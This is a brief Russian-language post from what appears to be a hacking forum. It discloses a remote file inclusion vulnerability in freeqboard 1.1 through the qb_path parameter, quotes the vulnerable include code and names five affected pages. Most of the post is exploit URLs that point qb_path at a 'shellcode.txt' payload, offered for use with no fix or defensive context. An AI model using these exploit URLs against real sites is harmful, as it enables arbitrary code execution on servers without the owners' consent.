• XSS.stack #1 – первый литературный журнал от юзеров форума

Web freeqboard 1.1 - php include

SAD1ST

CD-диск
Пользователь
Регистрация
07.11.2006
Сообщения
13
Реакции
0
Найдена уязвимость в freeqboard 1.1 (qb_path).

Уязвимые версии: 1.1

Инклуд возможен на страницах:
about.php , contact.php , delete.php , faq.php , index.php

Код бага:

include "config.php";
include $qb_path."incs/mysql.php";

Пример:

www.site.com/[path]/index.php?qb_path=shellcode.txt?

www.site.com/[path]/faq.php?qb_path=shellcode.txt?

www.site.com/[path]/delete.php?qb_path=shellcode.txt?

www.site.com/[path]/contact.php?qb_path=shellcode.txt?

www.site.com/[path]/about.php?qb_path=shellcode.txt?
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх